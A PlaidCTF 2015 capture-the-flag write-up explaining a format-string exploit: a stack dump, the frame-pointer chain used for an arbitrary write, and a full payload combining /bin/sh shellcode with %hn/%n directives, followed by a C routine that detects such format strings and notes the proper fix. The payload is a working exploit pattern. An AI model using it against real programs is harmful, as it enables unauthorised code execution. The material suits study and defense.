- To solve this challenge, we need to know and use a format string bug.
- To explain it more easily, I'll assume ASLR is turned off.
- This is the stack memory map; it can differ from computer to computer:
```
0xffffd600: 0xf7fe76db 0x00000000 0xffffd628 0x0804852c
0xffffd610: 0xffffd648 0xf7fedee0 0xf7e6662b 0x00000000
0xffffd620: 0xf7fb9000 0xf7fb9000 0xffffd62c 0x0804a480
0xffffd630: 0x0804a080 0x00000400 0xf7fb95a0 0x00000000
0xffffd640: 0xf7fb9000 0xf7fb9000 0x00000000 0xf7e21637
0xffffd650: 0x00000001 0xffffd6e4 0xffffd6ec 0x00000000
0xffffd660: 0x00000000 0x00000000 0xf7fb9000 0xf7ffdc04
0xffffd670: 0xf7ffd000 0x00000000 0xf7fb9000 0xf7fb9000
0xffffd680: 0x00000000 0x645b8886 0x5fdcc696 0x00000000
```
- Through 0xffffd608 (which holds the pointer 0xffffd628) we can change the value at 0xffffd628, and through 0xffffd628 we can then change any memory.
- At 0x0804a080 the input is stored, so we can put shellcode there (its address also never changes, which makes it a really good choice).
- I'll use the shellcode from [here](http://shell-storm.org/shellcode/files/shellcode-827.php).
- So the payload looks like this:
```
(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'+'%10x'*2+'%54785c'+'%hn'+'%10x'*6+'%134467096c'+'%n'";cat)
```
- That payload does not work when ASLR is turned on, so now I'll write a program to attack this.
- The attack program is [here](https://github.com/parksjin01/ctf/blob/master/2015/Plaid/ebp.py).
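As an added defensive check that is not part of this writeup or the linked script: a small C audit that walks the printf directive grammar and flags the two ingredients of the %hn/%n write shown above, a %n-family conversion and the very large field widths that ramp the character counter to the target value. The sample string is the directive part of the payload from this page; the 4096 width threshold is an assumption.

```c
#include <stdlib.h>
#include <string.h>

/* Constructed sample: the directive part of the writeup's payload (shellcode left out). */
static const char PAGE_PAYLOAD_FMT[] =
    "%10x%10x%54785c%hn%10x%10x%10x%10x%10x%10x%134467096c%n";

typedef struct {
    int write_conversions; /* %n-family directives (%n, %hn, %hhn, %ln, ...) */
    long max_width;        /* largest explicit field width seen */
} fmt_audit_t;

/* Walk the string with printf's directive grammar ("%%", flags, width, precision,
 * length modifier, conversion) and record what a %n write primitive needs: a write
 * conversion plus huge widths that ramp the characters-printed counter to the target. */
fmt_audit_t audit_format(const char *s) {
    fmt_audit_t r = {0, 0};
    char *end;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                 /* literal percent sign */
        while (*p && strchr("-+ #0", *p)) p++;   /* flags */
        if (*p == '*') {
            p++;                                 /* width supplied as an argument */
        } else {
            long w = strtol(p, &end, 10);        /* no digits: w == 0, end == p */
            if (w > r.max_width) r.max_width = w;
            p = end;
        }
        if (*p == '.') {                         /* precision: ".*" or ".digits" */
            p++;
            if (*p == '*') p++; else { strtol(p, &end, 10); p = end; }
        }
        while (*p && strchr("hlLjzt", *p)) p++;  /* length modifiers */
        if (*p == 'n') r.write_conversions++;
        if (!*p) break;                          /* string ended mid-directive */
    }
    return r;
}

/* Defender-side rule: reject the input before it can reach printf() if it carries a
 * %n write or a width far beyond anything a legitimate format uses (4096 is an
 * assumed threshold; tune it for the application). */
int looks_like_format_attack(const char *s) {
    fmt_audit_t a = audit_format(s);
    return a.write_conversions > 0 || a.max_width > 4096;
}
```

The real fix for the bug is still to never pass user input as the format argument (`printf("%s", buf)`, and build with `-Wformat-security`); the audit is a detection layer for inputs and logs.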
PlaidCTF 2015 writeup, by parksjin01. Created April 23, 2017 15:33.